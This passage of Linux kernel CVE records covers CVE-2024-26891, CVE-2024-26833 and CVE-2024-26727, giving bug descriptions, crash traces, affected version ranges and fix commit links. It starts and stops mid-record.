[ 4223.822635] dump_stack+0x6d/0x88
[ 4223.822635] panic+0x101/0x2d0
[ 4223.822635] ? ret_from_fork+0x11/0x30
[ 4223.822635] nmi_panic.cold.14+0xc/0xc
[ 4223.822636] watchdog_overflow_callback.cold.8+0x6d/0x81
[ 4223.822636] __perf_event_overflow+0x4f/0xf0
[ 4223.822636] handle_pmi_common
---truncated---
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6f7db75e1c469057fe7588ed959328ead771ccc7 Version: 6f7db75e1c469057fe7588ed959328ead771ccc7 Version: 6f7db75e1c469057fe7588ed959328ead771ccc7 Version: 6f7db75e1c469057fe7588ed959328ead771ccc7 Version: 6f7db75e1c469057fe7588ed959328ead771ccc7 Version: 6f7db75e1c469057fe7588ed959328ead771ccc7 Version: 6f7db75e1c469057fe7588ed959328ead771ccc7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26891",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:41:17.252617Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:47:46.218Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.551Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f873b85ec762c5a6abe94a7ddb31df5d3ba07d85"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d70f1c85113cd8c2aa8373f491ca5d1b22ec0554"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/34a7b30f56d30114bf4d436e4dc793afe326fbcf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b74b2a92e524d7c8dec8e02e95ecf18b667c062"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c04f2780919f20e2cc4846764221f5e802555868"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/025bc6b41e020aeb1e71f84ae3ffce945026de05"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4fc82cd907ac075648789cc3a00877778aa1838b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iommu/intel/pasid.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f873b85ec762c5a6abe94a7ddb31df5d3ba07d85",
"status": "affected",
"version": "6f7db75e1c469057fe7588ed959328ead771ccc7",
"versionType": "git"
},
{
"lessThan": "d70f1c85113cd8c2aa8373f491ca5d1b22ec0554",
"status": "affected",
"version": "6f7db75e1c469057fe7588ed959328ead771ccc7",
"versionType": "git"
},
{
"lessThan": "34a7b30f56d30114bf4d436e4dc793afe326fbcf",
"status": "affected",
"version": "6f7db75e1c469057fe7588ed959328ead771ccc7",
"versionType": "git"
},
{
"lessThan": "2b74b2a92e524d7c8dec8e02e95ecf18b667c062",
"status": "affected",
"version": "6f7db75e1c469057fe7588ed959328ead771ccc7",
"versionType": "git"
},
{
"lessThan": "c04f2780919f20e2cc4846764221f5e802555868",
"status": "affected",
"version": "6f7db75e1c469057fe7588ed959328ead771ccc7",
"versionType": "git"
},
{
"lessThan": "025bc6b41e020aeb1e71f84ae3ffce945026de05",
"status": "affected",
"version": "6f7db75e1c469057fe7588ed959328ead771ccc7",
"versionType": "git"
},
{
"lessThan": "4fc82cd907ac075648789cc3a00877778aa1838b",
"status": "affected",
"version": "6f7db75e1c469057fe7588ed959328ead771ccc7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iommu/intel/pasid.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.0"
},
{
"lessThan": "5.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu/vt-d: Don\u0027t issue ATS Invalidation request when device is disconnected\n\nFor those endpoint devices connect to system via hotplug capable ports,\nusers could request a hot reset to the device by flapping device\u0027s link\nthrough setting the slot\u0027s link control register, as pciehp_ist() DLLSC\ninterrupt sequence response, pciehp will unload the device driver and\nthen power it off. thus cause an IOMMU device-TLB invalidation (Intel\nVT-d spec, or ATS Invalidation in PCIe spec r6.1) request for non-existence\ntarget device to be sent and deadly loop to retry that request after ITE\nfault triggered in interrupt context.\n\nThat would cause following continuous hard lockup warning and system hang\n\n[ 4211.433662] pcieport 0000:17:01.0: pciehp: Slot(108): Link Down\n[ 4211.433664] pcieport 0000:17:01.0: pciehp: Slot(108): Card not present\n[ 4223.822591] NMI watchdog: Watchdog detected hard LOCKUP on cpu 144\n[ 4223.822622] CPU: 144 PID: 1422 Comm: irq/57-pciehp Kdump: loaded Tainted: G S\n OE kernel version xxxx\n[ 4223.822623] Hardware name: vendorname xxxx 666-106,\nBIOS 01.01.02.03.01 05/15/2023\n[ 4223.822623] RIP: 0010:qi_submit_sync+0x2c0/0x490\n[ 4223.822624] Code: 48 be 00 00 00 00 00 08 00 00 49 85 74 24 20 0f 95 c1 48 8b\n 57 10 83 c1 04 83 3c 1a 03 0f 84 a2 01 00 00 49 8b 04 24 8b 70 34 \u003c40\u003e f6 c6 1\n0 74 17 49 8b 04 24 8b 80 80 00 00 00 89 c2 d3 fa 41 39\n[ 4223.822624] RSP: 0018:ffffc4f074f0bbb8 EFLAGS: 00000093\n[ 4223.822625] RAX: ffffc4f040059000 RBX: 0000000000000014 RCX: 0000000000000005\n[ 4223.822625] RDX: ffff9f3841315800 RSI: 0000000000000000 RDI: ffff9f38401a8340\n[ 4223.822625] RBP: ffff9f38401a8340 R08: ffffc4f074f0bc00 R09: 0000000000000000\n[ 4223.822626] R10: 0000000000000010 R11: 0000000000000018 R12: ffff9f384005e200\n[ 4223.822626] R13: 0000000000000004 R14: 0000000000000046 R15: 0000000000000004\n[ 4223.822626] FS: 0000000000000000(0000) GS:ffffa237ae400000(0000)\nknlGS:0000000000000000\n[ 4223.822627] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 4223.822627] CR2: 00007ffe86515d80 CR3: 000002fd3000a001 CR4: 0000000000770ee0\n[ 4223.822627] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 4223.822628] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 4223.822628] PKRU: 55555554\n[ 4223.822628] Call Trace:\n[ 4223.822628] qi_flush_dev_iotlb+0xb1/0xd0\n[ 4223.822628] __dmar_remove_one_dev_info+0x224/0x250\n[ 4223.822629] dmar_remove_one_dev_info+0x3e/0x50\n[ 4223.822629] intel_iommu_release_device+0x1f/0x30\n[ 4223.822629] iommu_release_device+0x33/0x60\n[ 4223.822629] iommu_bus_notifier+0x7f/0x90\n[ 4223.822630] blocking_notifier_call_chain+0x60/0x90\n[ 4223.822630] device_del+0x2e5/0x420\n[ 4223.822630] pci_remove_bus_device+0x70/0x110\n[ 4223.822630] pciehp_unconfigure_device+0x7c/0x130\n[ 4223.822631] pciehp_disable_slot+0x6b/0x100\n[ 4223.822631] pciehp_handle_presence_or_link_change+0xd8/0x320\n[ 4223.822631] pciehp_ist+0x176/0x180\n[ 4223.822631] ? irq_finalize_oneshot.part.50+0x110/0x110\n[ 4223.822632] irq_thread_fn+0x19/0x50\n[ 4223.822632] irq_thread+0x104/0x190\n[ 4223.822632] ? irq_forced_thread_fn+0x90/0x90\n[ 4223.822632] ? irq_thread_check_affinity+0xe0/0xe0\n[ 4223.822633] kthread+0x114/0x130\n[ 4223.822633] ? __kthread_cancel_work+0x40/0x40\n[ 4223.822633] ret_from_fork+0x1f/0x30\n[ 4223.822633] Kernel panic - not syncing: Hard LOCKUP\n[ 4223.822634] CPU: 144 PID: 1422 Comm: irq/57-pciehp Kdump: loaded Tainted: G S\n OE kernel version xxxx\n[ 4223.822634] Hardware name: vendorname xxxx 666-106,\nBIOS 01.01.02.03.01 05/15/2023\n[ 4223.822634] Call Trace:\n[ 4223.822634] \u003cNMI\u003e\n[ 4223.822635] dump_stack+0x6d/0x88\n[ 4223.822635] panic+0x101/0x2d0\n[ 4223.822635] ? ret_from_fork+0x11/0x30\n[ 4223.822635] nmi_panic.cold.14+0xc/0xc\n[ 4223.822636] watchdog_overflow_callback.cold.8+0x6d/0x81\n[ 4223.822636] __perf_event_overflow+0x4f/0xf0\n[ 4223.822636] handle_pmi_common\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:59.877Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f873b85ec762c5a6abe94a7ddb31df5d3ba07d85"
},
{
"url": "https://git.kernel.org/stable/c/d70f1c85113cd8c2aa8373f491ca5d1b22ec0554"
},
{
"url": "https://git.kernel.org/stable/c/34a7b30f56d30114bf4d436e4dc793afe326fbcf"
},
{
"url": "https://git.kernel.org/stable/c/2b74b2a92e524d7c8dec8e02e95ecf18b667c062"
},
{
"url": "https://git.kernel.org/stable/c/c04f2780919f20e2cc4846764221f5e802555868"
},
{
"url": "https://git.kernel.org/stable/c/025bc6b41e020aeb1e71f84ae3ffce945026de05"
},
{
"url": "https://git.kernel.org/stable/c/4fc82cd907ac075648789cc3a00877778aa1838b"
}
],
"title": "iommu/vt-d: Don\u0027t issue ATS Invalidation request when device is disconnected",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26891",
"datePublished": "2024-04-17T10:27:44.061Z",
"dateReserved": "2024-02-19T14:20:24.186Z",
"dateUpdated": "2025-05-04T08:58:59.877Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26833 (GCVE-0-2024-26833)
Vulnerability from cvelistv5
Published
2024-04-17 10:10
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix memory leak in dm_sw_fini()
After destroying dmub_srv, the memory associated with it is
not freed, causing a memory leak:
unreferenced object 0xffff896302b45800 (size 1024):
comm "(udev-worker)", pid 222, jiffies 4294894636
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace (crc 6265fd77):
[<ffffffff993495ed>] kmalloc_trace+0x29d/0x340
[<ffffffffc0ea4a94>] dm_dmub_sw_init+0xb4/0x450 [amdgpu]
[<ffffffffc0ea4e55>] dm_sw_init+0x15/0x2b0 [amdgpu]
[<ffffffffc0ba8557>] amdgpu_device_init+0x1417/0x24e0 [amdgpu]
[<ffffffffc0bab285>] amdgpu_driver_load_kms+0x15/0x190 [amdgpu]
[<ffffffffc0ba09c7>] amdgpu_pci_probe+0x187/0x4e0 [amdgpu]
[<ffffffff9968fd1e>] local_pci_probe+0x3e/0x90
[<ffffffff996918a3>] pci_device_probe+0xc3/0x230
[<ffffffff99805872>] really_probe+0xe2/0x480
[<ffffffff99805c98>] __driver_probe_device+0x78/0x160
[<ffffffff99805daf>] driver_probe_device+0x1f/0x90
[<ffffffff9980601e>] __driver_attach+0xce/0x1c0
[<ffffffff99803170>] bus_for_each_dev+0x70/0xc0
[<ffffffff99804822>] bus_add_driver+0x112/0x210
[<ffffffff99807245>] driver_register+0x55/0x100
[<ffffffff990012d1>] do_one_initcall+0x41/0x300
Fix this by freeing dmub_srv after destroying it.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 743b9786b14ae0d7d13b3782dccad158e577e9bb Version: 743b9786b14ae0d7d13b3782dccad158e577e9bb Version: 743b9786b14ae0d7d13b3782dccad158e577e9bb Version: 743b9786b14ae0d7d13b3782dccad158e577e9bb Version: 743b9786b14ae0d7d13b3782dccad158e577e9bb Version: 743b9786b14ae0d7d13b3782dccad158e577e9bb |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26833",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T19:24:28.460328Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T19:24:36.114Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.539Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b49b022f7dfce85eb77d0d987008fde5c01d7857"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/33f649f1b1cea39ed360e6c12bba4fac83118e6e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/58168005337eabef345a872be3f87d0215ff3b30"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/10c6b90e975358c17856a578419dc449887899c2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/541e79265ea7e339a7c4a462feafe9f8f996e04b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bae67893578d608e35691dcdfa90c4957debf1d3"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b49b022f7dfce85eb77d0d987008fde5c01d7857",
"status": "affected",
"version": "743b9786b14ae0d7d13b3782dccad158e577e9bb",
"versionType": "git"
},
{
"lessThan": "33f649f1b1cea39ed360e6c12bba4fac83118e6e",
"status": "affected",
"version": "743b9786b14ae0d7d13b3782dccad158e577e9bb",
"versionType": "git"
},
{
"lessThan": "58168005337eabef345a872be3f87d0215ff3b30",
"status": "affected",
"version": "743b9786b14ae0d7d13b3782dccad158e577e9bb",
"versionType": "git"
},
{
"lessThan": "10c6b90e975358c17856a578419dc449887899c2",
"status": "affected",
"version": "743b9786b14ae0d7d13b3782dccad158e577e9bb",
"versionType": "git"
},
{
"lessThan": "541e79265ea7e339a7c4a462feafe9f8f996e04b",
"status": "affected",
"version": "743b9786b14ae0d7d13b3782dccad158e577e9bb",
"versionType": "git"
},
{
"lessThan": "bae67893578d608e35691dcdfa90c4957debf1d3",
"status": "affected",
"version": "743b9786b14ae0d7d13b3782dccad158e577e9bb",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix memory leak in dm_sw_fini()\n\nAfter destroying dmub_srv, the memory associated with it is\nnot freed, causing a memory leak:\n\nunreferenced object 0xffff896302b45800 (size 1024):\n comm \"(udev-worker)\", pid 222, jiffies 4294894636\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace (crc 6265fd77):\n [\u003cffffffff993495ed\u003e] kmalloc_trace+0x29d/0x340\n [\u003cffffffffc0ea4a94\u003e] dm_dmub_sw_init+0xb4/0x450 [amdgpu]\n [\u003cffffffffc0ea4e55\u003e] dm_sw_init+0x15/0x2b0 [amdgpu]\n [\u003cffffffffc0ba8557\u003e] amdgpu_device_init+0x1417/0x24e0 [amdgpu]\n [\u003cffffffffc0bab285\u003e] amdgpu_driver_load_kms+0x15/0x190 [amdgpu]\n [\u003cffffffffc0ba09c7\u003e] amdgpu_pci_probe+0x187/0x4e0 [amdgpu]\n [\u003cffffffff9968fd1e\u003e] local_pci_probe+0x3e/0x90\n [\u003cffffffff996918a3\u003e] pci_device_probe+0xc3/0x230\n [\u003cffffffff99805872\u003e] really_probe+0xe2/0x480\n [\u003cffffffff99805c98\u003e] __driver_probe_device+0x78/0x160\n [\u003cffffffff99805daf\u003e] driver_probe_device+0x1f/0x90\n [\u003cffffffff9980601e\u003e] __driver_attach+0xce/0x1c0\n [\u003cffffffff99803170\u003e] bus_for_each_dev+0x70/0xc0\n [\u003cffffffff99804822\u003e] bus_add_driver+0x112/0x210\n [\u003cffffffff99807245\u003e] driver_register+0x55/0x100\n [\u003cffffffff990012d1\u003e] do_one_initcall+0x41/0x300\n\nFix this by freeing dmub_srv after destroying it."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:33.191Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b49b022f7dfce85eb77d0d987008fde5c01d7857"
},
{
"url": "https://git.kernel.org/stable/c/33f649f1b1cea39ed360e6c12bba4fac83118e6e"
},
{
"url": "https://git.kernel.org/stable/c/58168005337eabef345a872be3f87d0215ff3b30"
},
{
"url": "https://git.kernel.org/stable/c/10c6b90e975358c17856a578419dc449887899c2"
},
{
"url": "https://git.kernel.org/stable/c/541e79265ea7e339a7c4a462feafe9f8f996e04b"
},
{
"url": "https://git.kernel.org/stable/c/bae67893578d608e35691dcdfa90c4957debf1d3"
}
],
"title": "drm/amd/display: Fix memory leak in dm_sw_fini()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26833",
"datePublished": "2024-04-17T10:10:01.654Z",
"dateReserved": "2024-02-19T14:20:24.181Z",
"dateUpdated": "2025-05-04T08:57:33.191Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26727 (GCVE-0-2024-26727)
Vulnerability from cvelistv5
Published
2024-04-03 14:55
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: do not ASSERT() if the newly created subvolume already got read
[BUG]
There is a syzbot crash, triggered by the ASSERT() during subvolume
creation:
assertion failed: !anon_dev, in fs/btrfs/disk-io.c:1319
------------[ cut here ]------------
kernel BUG at fs/btrfs/disk-io.c:1319!
invalid opcode: 0000 [#1] PREEMPT SMP KASAN
RIP: 0010:btrfs_get_root_ref.part.0+0x9aa/0xa60
<TASK>
btrfs_get_new_fs_root+0xd3/0xf0
create_subvol+0xd02/0x1650
btrfs_mksubvol+0xe95/0x12b0
__btrfs_ioctl_snap_create+0x2f9/0x4f0
btrfs_ioctl_snap_create+0x16b/0x200
btrfs_ioctl+0x35f0/0x5cf0
__x64_sys_ioctl+0x19d/0x210
do_syscall_64+0x3f/0xe0
entry_SYSCALL_64_after_hwframe+0x63/0x6b
---[ end trace 0000000000000000 ]---
[CAUSE]
During create_subvol(), after inserting root item for the newly created
subvolume, we would trigger btrfs_get_new_fs_root() to get the
btrfs_root of that subvolume.
The idea here is, we have preallocated an anonymous device number for
the subvolume, thus we can assign it to the new subvolume.
But there is really nothing preventing things like backref walk to read
the new subvolume.
If that happens before we call btrfs_get_new_fs_root(), the subvolume
would be read out, with a new anonymous device number assigned already.
In that case, we would trigger ASSERT(), as we really expect no one to
read out that subvolume (which is not yet accessible from the fs).
But things like backref walk is still possible to trigger the read on
the subvolume.
Thus our assumption on the ASSERT() is not correct in the first place.
[FIX]
Fix it by removing the ASSERT(), and just free the @anon_dev, reset it
to 0, and continue.
If the subvolume tree is read out by something else, it should have
already get a new anon_dev assigned thus we only need to free the
preallocated one.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788 Version: 2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788 Version: 2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788 Version: 2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788 Version: 2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788 Version: 2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788 Version: 917d608fe375041eb7f29befa6a6d7fd3cf32dde |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26727",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T19:28:59.725318Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T19:29:08.159Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.984Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3f5d47eb163bceb1b9e613c9003bae5fefc0046f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e31546b0f34af21738c4ceac47d662c00ee6382f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/66b317a2fc45b2ef66527ee3f8fa08fb5beab88d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/833775656d447c545133a744a0ed1e189ce61430"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a172344bfdabb46458e03708735d7b1a918c468"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e03ee2fe873eb68c1f9ba5112fee70303ebf9dfb"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/disk-io.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3f5d47eb163bceb1b9e613c9003bae5fefc0046f",
"status": "affected",
"version": "2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788",
"versionType": "git"
},
{
"lessThan": "e31546b0f34af21738c4ceac47d662c00ee6382f",
"status": "affected",
"version": "2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788",
"versionType": "git"
},
{
"lessThan": "66b317a2fc45b2ef66527ee3f8fa08fb5beab88d",
"status": "affected",
"version": "2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788",
"versionType": "git"
},
{
"lessThan": "833775656d447c545133a744a0ed1e189ce61430",
"status": "affected",
"version": "2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788",
"versionType": "git"
},
{
"lessThan": "5a172344bfdabb46458e03708735d7b1a918c468",
"status": "affected",
"version": "2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788",
"versionType": "git"
},
{
"lessThan": "e03ee2fe873eb68c1f9ba5112fee70303ebf9dfb",
"status": "affected",
"version": "2dfb1e43f57dd3aeaa66f7cf05d068db2d4c8788",
"versionType": "git"
},
{
"status": "affected",
"version": "917d608fe375041eb7f29befa6a6d7fd3cf32dde",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/disk-io.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
